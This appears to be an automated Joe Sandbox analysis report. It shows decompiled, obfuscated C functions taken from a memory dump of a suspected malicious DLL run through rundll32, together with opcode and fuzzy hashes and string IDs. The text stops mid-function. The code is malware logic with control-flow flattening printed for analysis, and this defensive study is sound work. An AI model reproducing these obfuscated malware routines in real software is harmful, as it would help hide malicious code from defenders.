                                                                                                                                    							if(_t310 == 0xb516bbb) {
                                                                                                                                    								_t310 = 0xc84e726;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								_t319 = _t310 - 0xc84e726;
                                                                                                                                    								if(_t310 == 0xc84e726) {
                                                                                                                                    									_push(_v1128);
                                                                                                                                    									_push(_v1152);
                                                                                                                                    									_t269 = E002DDCF7(_v1136, 0x2c1000, _t319);
                                                                                                                                    									_t289 =  *0x2e3e10; // 0x0
                                                                                                                                    									_t306 =  *0x2e3e10; // 0x0
                                                                                                                                    									E002C47CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
                                                                                                                                    									_t268 = E002CA8B0(_v1068, _t269, _v1148);
                                                                                                                                    									_t314 =  &(_t314[9]);
                                                                                                                                    									_t310 = 0x5b9c87d;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L9;
                                                                                                                                    					}
                                                                                                                                    					_push(_v1080);
                                                                                                                                    					_push( &_v1040);
                                                                                                                                    					_push(_v1124);
                                                                                                                                    					E002E13AD(_v1072,  &_v520, __eflags);
                                                                                                                                    					_t314 =  &(_t314[3]);
                                                                                                                                    					_t310 = 0xafb2886;
                                                                                                                                    					L9:
                                                                                                                                    					__eflags = _t310 - 0xafb2886;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				return _t268;
                                                                                                                                    			}


















































                                                                                                                                    0x002d693a
                                                                                                                                    0x002d6942
                                                                                                                                    0x002d694a
                                                                                                                                    0x002d6952
                                                                                                                                    0x002d695a
                                                                                                                                    0x002d6962
                                                                                                                                    0x002d6967
                                                                                                                                    0x002d696f
                                                                                                                                    0x002d6977
                                                                                                                                    0x002d6986
                                                                                                                                    0x002d6989
                                                                                                                                    0x002d698d
                                                                                                                                    0x002d6995
                                                                                                                                    0x002d699d
                                                                                                                                    0x002d69a5
                                                                                                                                    0x002d69ad
                                                                                                                                    0x002d69b5
                                                                                                                                    0x002d69ba
                                                                                                                                    0x002d69bf
                                                                                                                                    0x002d69c7
                                                                                                                                    0x002d69d7
                                                                                                                                    0x002d69db
                                                                                                                                    0x002d69e3
                                                                                                                                    0x002d69eb
                                                                                                                                    0x002d69f3
                                                                                                                                    0x002d69fb
                                                                                                                                    0x002d6a08
                                                                                                                                    0x002d6a09
                                                                                                                                    0x002d6a0d
                                                                                                                                    0x002d6a15
                                                                                                                                    0x002d6a22
                                                                                                                                    0x002d6a26
                                                                                                                                    0x002d6a2e
                                                                                                                                    0x002d6a36
                                                                                                                                    0x002d6a3e
                                                                                                                                    0x002d6a4c
                                                                                                                                    0x002d6a50
                                                                                                                                    0x002d6a60
                                                                                                                                    0x002d6a74
                                                                                                                                    0x002d6a74
                                                                                                                                    0x002d6a82
                                                                                                                                    0x002d6b0d
                                                                                                                                    0x002d6b16
                                                                                                                                    0x002d6b1e
                                                                                                                                    0x002d6b2f
                                                                                                                                    0x002d6b34
                                                                                                                                    0x002d6b47
                                                                                                                                    0x002d6b6a
                                                                                                                                    0x002d6b7c
                                                                                                                                    0x002d6b81
                                                                                                                                    0x002d6b84
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6a88
                                                                                                                                    0x002d6a8e
                                                                                                                                    0x002d6b06
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6a90
                                                                                                                                    0x002d6a90
                                                                                                                                    0x002d6a92
                                                                                                                                    0x002d6a98
                                                                                                                                    0x002d6aa1
                                                                                                                                    0x002d6aa9
                                                                                                                                    0x002d6aba
                                                                                                                                    0x002d6ad2
                                                                                                                                    0x002d6ae5
                                                                                                                                    0x002d6af7
                                                                                                                                    0x002d6afc
                                                                                                                                    0x002d6aff
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6aff
                                                                                                                                    0x002d6a92
                                                                                                                                    0x002d6a8e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6a82
                                                                                                                                    0x002d6b8e
                                                                                                                                    0x002d6b99
                                                                                                                                    0x002d6b9a
                                                                                                                                    0x002d6ba9
                                                                                                                                    0x002d6bae
                                                                                                                                    0x002d6bb1
                                                                                                                                    0x002d6bb3
                                                                                                                                    0x002d6bb3
                                                                                                                                    0x002d6bb3
                                                                                                                                    0x002d6bc5

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <E$?c3$Md$a@$yw
                                                                                                                                    • API String ID: 0-2084988834
                                                                                                                                    • Opcode ID: d139282b45ec784bc5d7cfacab5b853ba4f993fbc7fee41e4338e252ee77569d
                                                                                                                                    • Instruction ID: 0f3ce89e2d322c30cf210fd45c4099a9f165d203072169ee21cc95a3460f19c6
                                                                                                                                    • Opcode Fuzzy Hash: d139282b45ec784bc5d7cfacab5b853ba4f993fbc7fee41e4338e252ee77569d
                                                                                                                                    • Instruction Fuzzy Hash: EFC110724083809FD368CF25D58A81BBBF2FB94758F108A1DF5E696260D3B58A09CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002D0001(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                    				char _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				intOrPtr _v136;
                                                                                                                                    				intOrPtr _v140;
                                                                                                                                    				char _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				void* _t154;
                                                                                                                                    				void* _t174;
                                                                                                                                    				char _t178;
                                                                                                                                    				void* _t183;
                                                                                                                                    				char* _t189;
                                                                                                                                    				void* _t209;
                                                                                                                                    				signed int _t210;
                                                                                                                                    				signed int _t211;
                                                                                                                                    				signed int _t212;
                                                                                                                                    				signed int _t213;
                                                                                                                                    				signed int _t214;
                                                                                                                                    				signed int _t215;
                                                                                                                                    				signed int _t216;
                                                                                                                                    				signed int* _t220;
                                                                                                                                    
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_t209 = __edx;
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t154);
                                                                                                                                    				_v132 = _v132 & 0x00000000;
                                                                                                                                    				_t220 =  &(( &_v204)[3]);
                                                                                                                                    				_v140 = 0x6f537b;
                                                                                                                                    				_v136 = 0x2895cf;
                                                                                                                                    				_t183 = 0xf669bfa;
                                                                                                                                    				_v164 = 0xc3509d;
                                                                                                                                    				_v164 = _v164 >> 0xf;
                                                                                                                                    				_v164 = _v164 ^ 0x0007728b;
                                                                                                                                    				_v188 = 0x58efa0;
                                                                                                                                    				_v188 = _v188 + 0xffff9444;
                                                                                                                                    				_t210 = 0x2f;
                                                                                                                                    				_v188 = _v188 / _t210;
                                                                                                                                    				_v188 = _v188 ^ 0x000ac4b2;
                                                                                                                                    				_v176 = 0xa783cc;
                                                                                                                                    				_v176 = _v176 << 0xa;
                                                                                                                                    				_v176 = _v176 ^ 0x73295065;
                                                                                                                                    				_v176 = _v176 ^ 0xed239367;
                                                                                                                                    				_v148 = 0x42262a;
                                                                                                                                    				_v148 = _v148 | 0x228e56d6;
                                                                                                                                    				_v148 = _v148 ^ 0x22cd87d0;
                                                                                                                                    				_v204 = 0xc47428;
                                                                                                                                    				_v204 = _v204 + 0xffff2e33;
                                                                                                                                    				_v204 = _v204 + 0xffff2fa2;
                                                                                                                                    				_v204 = _v204 + 0xffff28a7;
                                                                                                                                    				_v204 = _v204 ^ 0x00c63754;
                                                                                                                                    				_v156 = 0x11bd56;
                                                                                                                                    				_t211 = 0x5c;
                                                                                                                                    				_v156 = _v156 * 0x6a;
                                                                                                                                    				_v156 = _v156 ^ 0x0752342f;
                                                                                                                                    				_v172 = 0x489beb;
                                                                                                                                    				_v172 = _v172 + 0xfe21;
                                                                                                                                    				_v172 = _v172 / _t211;
                                                                                                                                    				_v172 = _v172 ^ 0x0000a4d4;
                                                                                                                                    				_v192 = 0x2e5859;
                                                                                                                                    				_v192 = _v192 ^ 0x83ba67d9;
                                                                                                                                    				_t212 = 0x44;
                                                                                                                                    				_v192 = _v192 / _t212;
                                                                                                                                    				_v192 = _v192 ^ 0x01e00d99;
                                                                                                                                    				_v180 = 0x89bc6d;
                                                                                                                                    				_v180 = _v180 | 0xb1d25d45;
                                                                                                                                    				_v180 = _v180 << 0xe;
                                                                                                                                    				_v180 = _v180 ^ 0xff5cc309;
                                                                                                                                    				_v168 = 0x19805c;
                                                                                                                                    				_t213 = 0x18;
                                                                                                                                    				_v168 = _v168 * 0x16;
                                                                                                                                    				_v168 = _v168 ^ 0x4d2845a5;
                                                                                                                                    				_v168 = _v168 ^ 0x4f1adce1;
                                                                                                                                    				_v196 = 0x9cfdcd;
                                                                                                                                    				_v196 = _v196 / _t213;
                                                                                                                                    				_v196 = _v196 + 0xd8a6;
                                                                                                                                    				_v196 = _v196 ^ 0x0005e56c;
                                                                                                                                    				_v200 = 0x1d77da;
                                                                                                                                    				_t214 = 0x6b;
                                                                                                                                    				_v200 = _v200 / _t214;
                                                                                                                                    				_t215 = 9;
                                                                                                                                    				_v200 = _v200 / _t215;
                                                                                                                                    				_t216 = 0x59;
                                                                                                                                    				_v200 = _v200 / _t216;
                                                                                                                                    				_v200 = _v200 ^ 0x00052bad;
                                                                                                                                    				_v184 = 0x474669;
                                                                                                                                    				_v184 = _v184 * 0x25;
                                                                                                                                    				_v184 = _v184 + 0xffff8141;
                                                                                                                                    				_v184 = _v184 ^ 0x0a4cf000;
                                                                                                                                    				_v160 = 0x98ddfb;
                                                                                                                                    				_v160 = _v160 << 3;
                                                                                                                                    				_v160 = _v160 ^ 0x04cf55b1;
                                                                                                                                    				_v152 = 0xbbc225;
                                                                                                                                    				_v152 = _v152 * 0x58;
                                                                                                                                    				_v152 = _v152 ^ 0x408ec409;
                                                                                                                                    				while(_t183 != 0x4a2a3c4) {
                                                                                                                                    					if(_t183 == 0x640e5f9) {
                                                                                                                                    						__eflags = _v128;
                                                                                                                                    						_t189 =  &_v128;
                                                                                                                                    						while(__eflags != 0) {
                                                                                                                                    							_t178 =  *_t189;
                                                                                                                                    							__eflags = _t178 - 0x30;
                                                                                                                                    							if(_t178 < 0x30) {
                                                                                                                                    								L10:
                                                                                                                                    								__eflags = _t178 - 0x61;
                                                                                                                                    								if(_t178 < 0x61) {
                                                                                                                                    									L12:
                                                                                                                                    									__eflags = _t178 - 0x41;
                                                                                                                                    									if(_t178 < 0x41) {
                                                                                                                                    										L14:
                                                                                                                                    										 *_t189 = 0x58;
                                                                                                                                    									} else {
                                                                                                                                    										__eflags = _t178 - 0x5a;
                                                                                                                                    										if(_t178 > 0x5a) {
                                                                                                                                    											goto L14;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t178 - 0x7a;
                                                                                                                                    									if(_t178 > 0x7a) {
                                                                                                                                    										goto L12;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t178 - 0x39;
                                                                                                                                    								if(_t178 > 0x39) {
                                                                                                                                    									goto L10;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							_t189 = _t189 + 1;
                                                                                                                                    							__eflags =  *_t189;
                                                                                                                                    						}
                                                                                                                                    						_t183 = 0x4a2a3c4;
                                                                                                                                    						continue;
                                                                                                                                    					} else {
                                                                                                                                    						if(_t183 == 0x7562914) {
                                                                                                                                    							_v144 = 0x80;
                                                                                                                                    							_t178 = E002CCD29(_v164,  &_v144, _v176,  &_v128);
                                                                                                                                    							_t220 =  &(_t220[3]);
                                                                                                                                    							_t183 = 0x640e5f9;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t183 == 0xf669bfa) {
                                                                                                                                    								_t183 = 0x7562914;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L18:
                                                                                                                                    					__eflags = _t183 - 0x1718ff4;
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					return _t178;
                                                                                                                                    				}
                                                                                                                                    				_push(_v172);
                                                                                                                                    				_push(_v156);
                                                                                                                                    				_push(_v204);
                                                                                                                                    				_t174 = E002D8606(_v148, 0x2c1690, __eflags);
                                                                                                                                    				E002C2206( &_v128, _t209, _v196, _v200, _t174, E002CEE81(__eflags), _v184);
                                                                                                                                    				_t178 = E002CA8B0(_v160, _t174, _v152);
                                                                                                                                    				_t220 =  &(_t220[0xb]);
                                                                                                                                    				_t183 = 0x1718ff4;
                                                                                                                                    				goto L18;
                                                                                                                                    			}






































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                                    • API String ID: 0-3810143839
                                                                                                                                    • Opcode ID: 44ed16efca3cd1fdb597acf1eb2086d778758eb945c24923646fdcde01886ed2
                                                                                                                                    • Instruction ID: 9c40d31c8dcf407a8607ffd40f8ef61b42455fc149a0cebf2384003257bec237
                                                                                                                                    • Opcode Fuzzy Hash: 44ed16efca3cd1fdb597acf1eb2086d778758eb945c24923646fdcde01886ed2
                                                                                                                                    • Instruction Fuzzy Hash: D681B6B151A3419BD3A8CF26D588A1BBBE2FBC5718F005A1EF4C586260D3B4C949CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002C7735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v44;
                                                                                                                                    				void* _v56;
                                                                                                                                    				intOrPtr _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				unsigned int _v112;
                                                                                                                                    				unsigned int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				void* __ecx;
                                                                                                                                    				void* _t163;
                                                                                                                                    				signed int _t176;
                                                                                                                                    				void* _t188;
                                                                                                                                    				signed int _t205;
                                                                                                                                    				signed int* _t207;
                                                                                                                                    				void* _t209;
                                                                                                                                    				void* _t210;
                                                                                                                                    
                                                                                                                                    				_t186 = _a4;
                                                                                                                                    				_t207 = _a8;
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_t207);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t163);
                                                                                                                                    				_v60 = 0x524796;
                                                                                                                                    				_t210 = _t209 + 0x18;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t188 = 0x9c25eae;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v76 = 0x29f01;
                                                                                                                                    				_v76 = _v76 | 0x94be009d;
                                                                                                                                    				_v76 = _v76 ^ 0x94be9f9d;
                                                                                                                                    				_v108 = 0xafa956;
                                                                                                                                    				_v108 = _v108 + 0x628;
                                                                                                                                    				_v108 = _v108 ^ 0xf539d3de;
                                                                                                                                    				_v108 = _v108 ^ 0xf5927b2e;
                                                                                                                                    				_v92 = 0x300c11;
                                                                                                                                    				_v92 = _v92 ^ 0x95f7d427;
                                                                                                                                    				_v92 = _v92 ^ 0x95c19bc8;
                                                                                                                                    				_v116 = 0x7fd72e;
                                                                                                                                    				_v116 = _v116 >> 0x10;
                                                                                                                                    				_v116 = _v116 + 0x5d9b;
                                                                                                                                    				_v116 = _v116 ^ 0x0001fda4;
                                                                                                                                    				_v88 = 0x25a82f;
                                                                                                                                    				_t205 = 0x1b;
                                                                                                                                    				_v88 = _v88 * 0x72;
                                                                                                                                    				_v88 = _v88 ^ 0x10cad58f;
                                                                                                                                    				_v100 = 0xf91ce5;
                                                                                                                                    				_v100 = _v100 >> 0xc;
                                                                                                                                    				_v100 = _v100 ^ 0x71d91e41;
                                                                                                                                    				_v100 = _v100 ^ 0x71d9c87d;
                                                                                                                                    				_v136 = 0x5a524;
                                                                                                                                    				_v136 = _v136 ^ 0x65d544fc;
                                                                                                                                    				_v136 = _v136 / _t205;
                                                                                                                                    				_v136 = _v136 + 0xdad4;
                                                                                                                                    				_v136 = _v136 ^ 0x03c43220;
                                                                                                                                    				_v68 = 0xd5537a;
                                                                                                                                    				_v68 = _v68 + 0xffffd52f;
                                                                                                                                    				_v68 = _v68 ^ 0x00d2b66c;
                                                                                                                                    				_v128 = 0x59397b;
                                                                                                                                    				_v128 = _v128 ^ 0x5dfc0cc3;
                                                                                                                                    				_v128 = _v128 + 0x56f6;
                                                                                                                                    				_v128 = _v128 + 0xff83;
                                                                                                                                    				_v128 = _v128 ^ 0x5dafd3d4;
                                                                                                                                    				_v104 = 0x85edfa;
                                                                                                                                    				_v104 = _v104 | 0x32b3baf7;
                                                                                                                                    				_v104 = _v104 ^ 0x32b12396;
                                                                                                                                    				_v112 = 0x4c4fc6;
                                                                                                                                    				_v112 = _v112 + 0xbf9f;
                                                                                                                                    				_v112 = _v112 >> 1;
                                                                                                                                    				_v112 = _v112 ^ 0x002f2047;
                                                                                                                                    				_v120 = 0xc21a43;
                                                                                                                                    				_v120 = _v120 | 0x0781619f;
                                                                                                                                    				_v120 = _v120 ^ 0x30a197e6;
                                                                                                                                    				_v120 = _v120 ^ 0x376a3e6d;
                                                                                                                                    				_v84 = 0xaf6a80;
                                                                                                                                    				_v84 = _v84 + 0xffff12f3;
                                                                                                                                    				_v84 = _v84 ^ 0x00ae6f5f;
                                                                                                                                    				_v64 = 0x7bdfb0;
                                                                                                                                    				_v64 = _v64 >> 2;
                                                                                                                                    				_v64 = _v64 ^ 0x00114c08;
                                                                                                                                    				_v96 = 0x6b35de;
                                                                                                                                    				_v96 = _v96 * 0x60;
                                                                                                                                    				_v96 = _v96 ^ 0x283b6418;
                                                                                                                                    				_v124 = 0x52b9d2;
                                                                                                                                    				_v124 = _v124 | 0x40c5122c;
                                                                                                                                    				_v124 = _v124 << 8;
                                                                                                                                    				_v124 = _v124 >> 0x10;
                                                                                                                                    				_v124 = _v124 ^ 0x0001910d;
                                                                                                                                    				_v132 = 0x44d0f9;
                                                                                                                                    				_v132 = _v132 * 0x29;
                                                                                                                                    				_v132 = _v132 + 0xf17;
                                                                                                                                    				_v132 = _v132 * 0x65;
                                                                                                                                    				_v132 = _v132 ^ 0x592f3fb2;
                                                                                                                                    				_v72 = 0xc75ad6;
                                                                                                                                    				_v72 = _v72 ^ 0xe0bef3a1;
                                                                                                                                    				_v72 = _v72 ^ 0xe072572c;
                                                                                                                                    				_v80 = 0xa6c1d6;
                                                                                                                                    				_v80 = _v80 + 0xc8d;
                                                                                                                                    				_v80 = _v80 ^ 0x00ac29a9;
                                                                                                                                    				do {
                                                                                                                                    					while(_t188 != 0xe27b71) {
                                                                                                                                    						if(_t188 == 0x372e88b) {
                                                                                                                                    							_push(_t188);
                                                                                                                                    							_push(_t188);
                                                                                                                                    							_t176 = E002C7FF2(_t207[1]);
                                                                                                                                    							 *_t207 = _t176;
                                                                                                                                    							__eflags = _t176;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								_t188 = 0xe27b71;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t188 == 0x93f98fe) {
                                                                                                                                    								_t207[1] = E002E0C14(_t186);
                                                                                                                                    								_t188 = 0x372e88b;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t188 == 0x9c25eae) {
                                                                                                                                    									_t188 = 0x93f98fe;
                                                                                                                                    									 *_t207 =  *_t207 & 0x00000000;
                                                                                                                                    									_t207[1] = _v76;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t188 == 0xa0c9f29) {
                                                                                                                                    										_t146 =  &_v112; // 0x2f2047
                                                                                                                                    										E002D0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
                                                                                                                                    										_t210 = _t210 + 0x10;
                                                                                                                                    										_t188 = 0xc7f60b3;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t188 == 0xc7f60b3) {
                                                                                                                                    											_t144 =  &_v84; // 0xe072572c
                                                                                                                                    											E002E0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
                                                                                                                                    											_t210 = _t210 + 0x10;
                                                                                                                                    											_t188 = 0xcf8cba1;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											_t219 = _t188 - 0xcf8cba1;
                                                                                                                                    											if(_t188 != 0xcf8cba1) {
                                                                                                                                    												goto L17;
                                                                                                                                    											} else {
                                                                                                                                    												E002E0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L9:
                                                                                                                                    						return 0 |  *_t207 != 0x00000000;
                                                                                                                                    					}
                                                                                                                                    					E002C3DBC( &_v44, _t207, _v88, _v100, _v136);
                                                                                                                                    					_t210 = _t210 + 0xc;
                                                                                                                                    					_t188 = 0xa0c9f29;
                                                                                                                                    					L17:
                                                                                                                                    					__eflags = _t188 - 0x560a718;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L9;
                                                                                                                                    			}


































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                                    • API String ID: 0-2956538602
                                                                                                                                    • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                    • Instruction ID: 581fe68a8cdd3c3a263ccf5366634a4668532d569cde9211f3686db40d3f006e
                                                                                                                                    • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                    • Instruction Fuzzy Hash: 9B913E710193419FD368CF65D986A2BBBF1FBC4718F109A1CF29296220D3B5CA598F43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002C4816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				void* _t164;
                                                                                                                                    				void* _t179;
                                                                                                                                    				signed int _t190;
                                                                                                                                    				signed int _t191;
                                                                                                                                    				signed int _t192;
                                                                                                                                    				signed int _t193;
                                                                                                                                    				void* _t196;
                                                                                                                                    				void* _t213;
                                                                                                                                    				void* _t214;
                                                                                                                                    				signed int* _t217;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t213 = __edx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t164);
                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                    				_t217 =  &(( &_v88)[6]);
                                                                                                                                    				_v16 = 0xc0a747;
                                                                                                                                    				_v12 = 0xade381;
                                                                                                                                    				_t214 = 0;
                                                                                                                                    				_v8 = 0x11050f;
                                                                                                                                    				_t196 = 0x5adc597;
                                                                                                                                    				_v84 = 0xdf9e69;
                                                                                                                                    				_v84 = _v84 >> 2;
                                                                                                                                    				_v84 = _v84 + 0xffff5795;
                                                                                                                                    				_v84 = _v84 >> 5;
                                                                                                                                    				_v84 = _v84 ^ 0x0001b9f8;
                                                                                                                                    				_v68 = 0xf2d8cd;
                                                                                                                                    				_v68 = _v68 << 6;
                                                                                                                                    				_v68 = _v68 | 0xe3b79c6a;
                                                                                                                                    				_v68 = _v68 + 0xec5a;
                                                                                                                                    				_v68 = _v68 ^ 0xffb8abc5;
                                                                                                                                    				_v40 = 0x5d8c34;
                                                                                                                                    				_v40 = _v40 >> 9;
                                                                                                                                    				_v40 = _v40 ^ 0x40002ec6;
                                                                                                                                    				_v28 = 0x37ca39;
                                                                                                                                    				_v28 = _v28 | 0x456668c2;
                                                                                                                                    				_v28 = _v28 ^ 0x0577eafb;
                                                                                                                                    				_v80 = 0xd16358;
                                                                                                                                    				_v80 = _v80 ^ 0xe637ce9d;
                                                                                                                                    				_t190 = 0x68;
                                                                                                                                    				_v80 = _v80 * 0x4b;
                                                                                                                                    				_v80 = _v80 << 2;
                                                                                                                                    				_v80 = _v80 ^ 0x965c2e63;
                                                                                                                                    				_v56 = 0xfc1806;
                                                                                                                                    				_v56 = _v56 + 0xffffb57d;
                                                                                                                                    				_v56 = _v56 | 0x299c1b97;
                                                                                                                                    				_v56 = _v56 ^ 0x29fc2736;
                                                                                                                                    				_v44 = 0x81586;
                                                                                                                                    				_v44 = _v44 | 0xba5390c4;
                                                                                                                                    				_v44 = _v44 ^ 0xba584850;
                                                                                                                                    				_v60 = 0x52e6aa;
                                                                                                                                    				_v60 = _v60 >> 0xa;
                                                                                                                                    				_v60 = _v60 * 0x28;
                                                                                                                                    				_v60 = _v60 ^ 0x00066c4e;
                                                                                                                                    				_v48 = 0x7a334;
                                                                                                                                    				_v48 = _v48 + 0xfffff5af;
                                                                                                                                    				_v48 = _v48 ^ 0x0009652d;
                                                                                                                                    				_v52 = 0x3bf8e8;
                                                                                                                                    				_v52 = _v52 / _t190;
                                                                                                                                    				_v52 = _v52 ^ 0x00025bcb;
                                                                                                                                    				_v64 = 0xacc490;
                                                                                                                                    				_t191 = 0x6f;
                                                                                                                                    				_v64 = _v64 / _t191;
                                                                                                                                    				_v64 = _v64 ^ 0xce7acdce;
                                                                                                                                    				_v64 = _v64 ^ 0xce756fa5;
                                                                                                                                    				_v88 = 0x557b83;
                                                                                                                                    				_v88 = _v88 ^ 0xfc4fd146;
                                                                                                                                    				_v88 = _v88 ^ 0x87bb4e9a;
                                                                                                                                    				_v88 = _v88 ^ 0x18fbc6ce;
                                                                                                                                    				_v88 = _v88 ^ 0x635c68ef;
                                                                                                                                    				_v24 = 0xa24557;
